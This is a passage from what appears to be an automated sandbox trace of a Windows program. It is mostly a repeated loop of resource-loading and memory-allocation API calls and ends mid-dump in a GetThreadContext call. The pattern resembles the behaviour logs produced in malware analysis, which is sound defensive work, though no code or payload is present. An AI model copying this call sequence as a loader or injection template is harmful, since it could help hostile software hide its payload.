lpName=0x4ab, lpType=0x7) returned 0x491de0 [0133.333] SizeofResource (hModule=0x400000, hResInfo=0x491de0) returned 0xdc [0133.333] LoadResource (hModule=0x400000, hResInfo=0x491de0) returned 0x4a3f08 [0133.333] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.334] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.334] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.334] FindResourceW (hModule=0x400000, lpName=0x4ac, lpType=0x7) returned 0x491df0 [0133.334] SizeofResource (hModule=0x400000, hResInfo=0x491df0) returned 0xdc [0133.334] LoadResource (hModule=0x400000, hResInfo=0x491df0) returned 0x4a3fe4 [0133.334] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.334] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.334] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.334] FindResourceW (hModule=0x400000, lpName=0x4ad, lpType=0x7) returned 0x491e00 [0133.334] SizeofResource (hModule=0x400000, hResInfo=0x491e00) returned 0xdc [0133.334] LoadResource (hModule=0x400000, hResInfo=0x491e00) returned 0x4a40c0 [0133.334] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.334] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.334] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.334] FindResourceW (hModule=0x400000, lpName=0x4ae, lpType=0x7) returned 0x491e10 [0133.334] SizeofResource (hModule=0x400000, hResInfo=0x491e10) returned 0xdc [0133.334] LoadResource (hModule=0x400000, hResInfo=0x491e10) returned 0x4a419c [0133.334] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.335] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.335] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.335] FindResourceW (hModule=0x400000, lpName=0x4af, lpType=0x7) returned 0x491e20 [0133.335] SizeofResource (hModule=0x400000, hResInfo=0x491e20) returned 0xdc [0133.335] LoadResource (hModule=0x400000, hResInfo=0x491e20) returned 0x4a4278 [0133.335] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.335] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.335] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.335] FindResourceW (hModule=0x400000, lpName=0x4b0, lpType=0x7) returned 0x491e30 [0133.335] SizeofResource (hModule=0x400000, hResInfo=0x491e30) returned 0xdc [0133.335] LoadResource (hModule=0x400000, hResInfo=0x491e30) returned 0x4a4354 [0133.335] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.335] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.335] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.335] FindResourceW (hModule=0x400000, lpName=0x4b1, lpType=0x7) returned 0x491e40 [0133.335] SizeofResource (hModule=0x400000, hResInfo=0x491e40) returned 0xdc [0133.335] LoadResource (hModule=0x400000, hResInfo=0x491e40) returned 0x4a4430 [0133.335] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.335] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.336] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.336] FindResourceW (hModule=0x400000, lpName=0x4b2, lpType=0x7) returned 0x491e50 [0133.336] SizeofResource (hModule=0x400000, hResInfo=0x491e50) returned 0xdc [0133.336] LoadResource (hModule=0x400000, hResInfo=0x491e50) returned 0x4a450c [0133.336] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.336] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.336] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.336] FindResourceW (hModule=0x400000, lpName=0x4b3, lpType=0x7) returned 0x491e60 [0133.336] SizeofResource (hModule=0x400000, hResInfo=0x491e60) returned 0xdc [0133.336] LoadResource (hModule=0x400000, hResInfo=0x491e60) returned 0x4a45e8 [0133.336] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.336] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.336] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.336] FindResourceW (hModule=0x400000, lpName=0x4b4, lpType=0x7) returned 0x491e70 [0133.336] SizeofResource (hModule=0x400000, hResInfo=0x491e70) returned 0xdc [0133.336] LoadResource (hModule=0x400000, hResInfo=0x491e70) returned 0x4a46c4 [0133.336] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.336] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.337] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.337] FindResourceW (hModule=0x400000, lpName=0x4b5, lpType=0x7) returned 0x491e80 [0133.337] SizeofResource (hModule=0x400000, hResInfo=0x491e80) returned 0xdc [0133.337] LoadResource (hModule=0x400000, hResInfo=0x491e80) returned 0x4a47a0 [0133.337] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.337] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.337] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.337] FindResourceW (hModule=0x400000, lpName=0x4b6, lpType=0x7) returned 0x491e90 [0133.337] SizeofResource (hModule=0x400000, hResInfo=0x491e90) returned 0xdc [0133.337] LoadResource (hModule=0x400000, hResInfo=0x491e90) returned 0x4a487c [0133.337] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.337] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.337] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.337] FindResourceW (hModule=0x400000, lpName=0x4b7, lpType=0x7) returned 0x491ea0 [0133.337] SizeofResource (hModule=0x400000, hResInfo=0x491ea0) returned 0xdc [0133.337] LoadResource (hModule=0x400000, hResInfo=0x491ea0) returned 0x4a4958 [0133.337] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.337] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.337] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.338] FindResourceW (hModule=0x400000, lpName=0x4b8, lpType=0x7) returned 0x491eb0 [0133.338] SizeofResource (hModule=0x400000, hResInfo=0x491eb0) returned 0xdc [0133.338] LoadResource (hModule=0x400000, hResInfo=0x491eb0) returned 0x4a4a34 [0133.338] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.338] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.338] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.338] FindResourceW (hModule=0x400000, lpName=0x4b9, lpType=0x7) returned 0x491ec0 [0133.338] SizeofResource (hModule=0x400000, hResInfo=0x491ec0) returned 0xdc [0133.338] LoadResource (hModule=0x400000, hResInfo=0x491ec0) returned 0x4a4b10 [0133.338] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.338] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.338] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.338] FindResourceW (hModule=0x400000, lpName=0x4ba, lpType=0x7) returned 0x491ed0 [0133.338] SizeofResource (hModule=0x400000, hResInfo=0x491ed0) returned 0xdc [0133.338] LoadResource (hModule=0x400000, hResInfo=0x491ed0) returned 0x4a4bec [0133.338] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.338] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.338] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.338] FindResourceW (hModule=0x400000, lpName=0x4bb, lpType=0x7) returned 0x491ee0 [0133.338] SizeofResource (hModule=0x400000, hResInfo=0x491ee0) returned 0xdc [0133.338] LoadResource (hModule=0x400000, hResInfo=0x491ee0) returned 0x4a4cc8 [0133.338] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.339] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.339] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.339] FindResourceW (hModule=0x400000, lpName=0x4bc, lpType=0x7) returned 0x491ef0 [0133.339] SizeofResource (hModule=0x400000, hResInfo=0x491ef0) returned 0xdc [0133.339] LoadResource (hModule=0x400000, hResInfo=0x491ef0) returned 0x4a4da4 [0133.339] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.339] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.339] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.339] FindResourceW (hModule=0x400000, lpName=0x4bd, lpType=0x7) returned 0x491f00 [0133.339] SizeofResource (hModule=0x400000, hResInfo=0x491f00) returned 0xdc [0133.339] LoadResource (hModule=0x400000, hResInfo=0x491f00) returned 0x4a4e80 [0133.339] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.339] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.339] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.339] FindResourceW (hModule=0x400000, lpName=0x4be, lpType=0x7) returned 0x491f10 [0133.339] SizeofResource (hModule=0x400000, hResInfo=0x491f10) returned 0xdc [0133.339] LoadResource (hModule=0x400000, hResInfo=0x491f10) returned 0x4a4f5c [0133.339] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.340] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.340] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.340] FindResourceW (hModule=0x400000, lpName=0x4bf, lpType=0x7) returned 0x491f20 [0133.340] SizeofResource (hModule=0x400000, hResInfo=0x491f20) returned 0xdc [0133.340] LoadResource (hModule=0x400000, hResInfo=0x491f20) returned 0x4a5038 [0133.340] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.340] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.340] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.340] FindResourceW (hModule=0x400000, lpName=0x4c0, lpType=0x7) returned 0x491f30 [0133.340] SizeofResource (hModule=0x400000, hResInfo=0x491f30) returned 0xdc [0133.340] LoadResource (hModule=0x400000, hResInfo=0x491f30) returned 0x4a5114 [0133.340] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.340] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.340] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.340] FindResourceW (hModule=0x400000, lpName=0x4c1, lpType=0x7) returned 0x491f40 [0133.340] SizeofResource (hModule=0x400000, hResInfo=0x491f40) returned 0xdc [0133.340] LoadResource (hModule=0x400000, hResInfo=0x491f40) returned 0x4a51f0 [0133.340] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.341] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.341] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.341] FindResourceW (hModule=0x400000, lpName=0x4c2, lpType=0x7) returned 0x491f50 [0133.341] SizeofResource (hModule=0x400000, hResInfo=0x491f50) returned 0xdc [0133.341] LoadResource (hModule=0x400000, hResInfo=0x491f50) returned 0x4a52cc [0133.341] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.341] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.341] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.341] FindResourceW (hModule=0x400000, lpName=0x4c3, lpType=0x7) returned 0x491f60 [0133.341] SizeofResource (hModule=0x400000, hResInfo=0x491f60) returned 0xdc [0133.341] LoadResource (hModule=0x400000, hResInfo=0x491f60) returned 0x4a53a8 [0133.341] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.341] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.341] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.341] FindResourceW (hModule=0x400000, lpName=0x4c4, lpType=0x7) returned 0x491f70 [0133.341] SizeofResource (hModule=0x400000, hResInfo=0x491f70) returned 0xdc [0133.341] LoadResource (hModule=0x400000, hResInfo=0x491f70) returned 0x4a5484 [0133.341] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.341] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.342] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.342] FindResourceW (hModule=0x400000, lpName=0x4c5, lpType=0x7) returned 0x491f80 [0133.342] SizeofResource (hModule=0x400000, hResInfo=0x491f80) returned 0xdc [0133.342] LoadResource (hModule=0x400000, hResInfo=0x491f80) returned 0x4a5560 [0133.342] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.342] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.342] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.342] FindResourceW (hModule=0x400000, lpName=0x4c6, lpType=0x7) returned 0x491f90 [0133.342] SizeofResource (hModule=0x400000, hResInfo=0x491f90) returned 0xdc [0133.342] LoadResource (hModule=0x400000, hResInfo=0x491f90) returned 0x4a563c [0133.342] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.342] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.342] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.342] FindResourceW (hModule=0x400000, lpName=0x4c7, lpType=0x7) returned 0x491fa0 [0133.342] SizeofResource (hModule=0x400000, hResInfo=0x491fa0) returned 0xdc [0133.342] LoadResource (hModule=0x400000, hResInfo=0x491fa0) returned 0x4a5718 [0133.342] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.342] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.343] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.343] FindResourceW (hModule=0x400000, lpName=0x4c8, lpType=0x7) returned 0x491fb0 [0133.343] SizeofResource (hModule=0x400000, hResInfo=0x491fb0) returned 0xdc [0133.343] LoadResource (hModule=0x400000, hResInfo=0x491fb0) returned 0x4a57f4 [0133.343] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.343] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.343] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.343] FindResourceW (hModule=0x400000, lpName=0x4c9, lpType=0x7) returned 0x491fc0 [0133.343] SizeofResource (hModule=0x400000, hResInfo=0x491fc0) returned 0xdc [0133.343] LoadResource (hModule=0x400000, hResInfo=0x491fc0) returned 0x4a58d0 [0133.343] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.343] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.343] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.343] FindResourceW (hModule=0x400000, lpName=0x4ca, lpType=0x7) returned 0x491fd0 [0133.343] SizeofResource (hModule=0x400000, hResInfo=0x491fd0) returned 0xdc [0133.343] LoadResource (hModule=0x400000, hResInfo=0x491fd0) returned 0x4a59ac [0133.343] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.343] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.343] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.343] FindResourceW (hModule=0x400000, lpName=0x4cb, lpType=0x7) returned 0x491fe0 [0133.343] SizeofResource (hModule=0x400000, hResInfo=0x491fe0) returned 0xdc [0133.344] LoadResource (hModule=0x400000, hResInfo=0x491fe0) returned 0x4a5a88 [0133.344] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.344] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.344] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.344] FindResourceW (hModule=0x400000, lpName=0x4cc, lpType=0x7) returned 0x491ff0 [0133.344] SizeofResource (hModule=0x400000, hResInfo=0x491ff0) returned 0xdc [0133.344] LoadResource (hModule=0x400000, hResInfo=0x491ff0) returned 0x4a5b64 [0133.344] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.344] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.344] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.344] FindResourceW (hModule=0x400000, lpName=0x4cd, lpType=0x7) returned 0x492000 [0133.344] SizeofResource (hModule=0x400000, hResInfo=0x492000) returned 0xdc [0133.344] LoadResource (hModule=0x400000, hResInfo=0x492000) returned 0x4a5c40 [0133.344] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.344] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.344] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.344] FindResourceW (hModule=0x400000, lpName=0x4ce, lpType=0x7) returned 0x492010 [0133.344] SizeofResource (hModule=0x400000, hResInfo=0x492010) returned 0xdc [0133.345] LoadResource (hModule=0x400000, hResInfo=0x492010) returned 0x4a5d1c [0133.345] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.345] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.345] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.345] FindResourceW (hModule=0x400000, lpName=0x4cf, lpType=0x7) returned 0x492020 [0133.345] SizeofResource (hModule=0x400000, hResInfo=0x492020) returned 0xdc [0133.345] LoadResource (hModule=0x400000, hResInfo=0x492020) returned 0x4a5df8 [0133.345] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.345] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.345] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.345] FindResourceW (hModule=0x400000, lpName=0x4d0, lpType=0x7) returned 0x492030 [0133.345] SizeofResource (hModule=0x400000, hResInfo=0x492030) returned 0xdc [0133.345] LoadResource (hModule=0x400000, hResInfo=0x492030) returned 0x4a5ed4 [0133.345] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.345] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.345] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.345] FindResourceW (hModule=0x400000, lpName=0x4d1, lpType=0x7) returned 0x492040 [0133.345] SizeofResource (hModule=0x400000, hResInfo=0x492040) returned 0xdc [0133.345] LoadResource (hModule=0x400000, hResInfo=0x492040) returned 0x4a5fb0 [0133.345] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.346] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.346] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.346] FindResourceW (hModule=0x400000, lpName=0x4d2, lpType=0x7) returned 0x492050 [0133.346] SizeofResource (hModule=0x400000, hResInfo=0x492050) returned 0xdc [0133.346] LoadResource (hModule=0x400000, hResInfo=0x492050) returned 0x4a608c [0133.346] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.346] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.346] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.346] FindResourceW (hModule=0x400000, lpName=0x4d3, lpType=0x7) returned 0x492060 [0133.346] SizeofResource (hModule=0x400000, hResInfo=0x492060) returned 0xdc [0133.346] LoadResource (hModule=0x400000, hResInfo=0x492060) returned 0x4a6168 [0133.346] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.346] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.346] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.346] FindResourceW (hModule=0x400000, lpName=0x4d4, lpType=0x7) returned 0x492070 [0133.346] SizeofResource (hModule=0x400000, hResInfo=0x492070) returned 0xdc [0133.346] LoadResource (hModule=0x400000, hResInfo=0x492070) returned 0x4a6244 [0133.346] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.347] FindResourceW (hModule=0x400000, lpName=0x4d5, lpType=0x7) returned 0x492080 [0133.347] SizeofResource (hModule=0x400000, hResInfo=0x492080) returned 0xdc [0133.347] LoadResource (hModule=0x400000, hResInfo=0x492080) returned 0x4a6320 [0133.347] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.347] FindResourceW (hModule=0x400000, lpName=0x4d6, lpType=0x7) returned 0x492090 [0133.347] SizeofResource (hModule=0x400000, hResInfo=0x492090) returned 0xdc [0133.347] LoadResource (hModule=0x400000, hResInfo=0x492090) returned 0x4a63fc [0133.347] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.347] FindResourceW (hModule=0x400000, lpName=0x4d7, lpType=0x7) returned 0x4920a0 [0133.347] SizeofResource (hModule=0x400000, hResInfo=0x4920a0) returned 0xdc [0133.347] LoadResource (hModule=0x400000, hResInfo=0x4920a0) returned 0x4a64d8 [0133.347] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.347] FindResourceW (hModule=0x400000, lpName=0x4d8, lpType=0x7) returned 0x4920b0 [0133.347] SizeofResource (hModule=0x400000, hResInfo=0x4920b0) returned 0xdc [0133.347] LoadResource (hModule=0x400000, hResInfo=0x4920b0) returned 0x4a65b4 [0133.347] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.347] FindResourceW (hModule=0x400000, lpName=0x4d9, lpType=0x7) returned 0x4920c0 [0133.347] SizeofResource (hModule=0x400000, hResInfo=0x4920c0) returned 0xdc [0133.347] LoadResource (hModule=0x400000, hResInfo=0x4920c0) returned 0x4a6690 [0133.347] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.347] FindResourceW (hModule=0x400000, lpName=0x4da, lpType=0x7) returned 0x4920d0 [0133.348] SizeofResource (hModule=0x400000, hResInfo=0x4920d0) returned 0xdc [0133.348] LoadResource (hModule=0x400000, hResInfo=0x4920d0) returned 0x4a676c [0133.348] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.348] FindResourceW (hModule=0x400000, lpName=0x4db, lpType=0x7) returned 0x4920e0 [0133.348] SizeofResource (hModule=0x400000, hResInfo=0x4920e0) returned 0xdc [0133.348] LoadResource (hModule=0x400000, hResInfo=0x4920e0) returned 0x4a6848 [0133.348] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.348] FindResourceW (hModule=0x400000, lpName=0x4dc, lpType=0x7) returned 0x4920f0 [0133.348] SizeofResource (hModule=0x400000, hResInfo=0x4920f0) returned 0xdc [0133.348] LoadResource (hModule=0x400000, hResInfo=0x4920f0) returned 0x4a6924 [0133.348] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.348] FindResourceW (hModule=0x400000, lpName=0x4dd, lpType=0x7) returned 0x492100 [0133.348] SizeofResource (hModule=0x400000, hResInfo=0x492100) returned 0xdc [0133.348] LoadResource (hModule=0x400000, hResInfo=0x492100) returned 0x4a6a00 [0133.348] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.348] FindResourceW (hModule=0x400000, lpName=0x4de, lpType=0x7) returned 0x492110 [0133.348] SizeofResource (hModule=0x400000, hResInfo=0x492110) returned 0xdc [0133.348] LoadResource (hModule=0x400000, hResInfo=0x492110) returned 0x4a6adc [0133.348] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.348] FindResourceW (hModule=0x400000, lpName=0x4df, lpType=0x7) returned 0x492120 [0133.348] SizeofResource (hModule=0x400000, hResInfo=0x492120) returned 0xdc [0133.348] LoadResource (hModule=0x400000, hResInfo=0x492120) returned 0x4a6bb8 [0133.348] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.349] FindResourceW (hModule=0x400000, lpName=0x4e0, lpType=0x7) returned 0x492130 [0133.349] SizeofResource (hModule=0x400000, hResInfo=0x492130) returned 0xdc [0133.349] LoadResource (hModule=0x400000, hResInfo=0x492130) returned 0x4a6c94 [0133.349] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.363] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.363] GetThreadContext (in: hThread=0xd8, lpContext=0x3f0000 | out: lpContext=0x3f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, 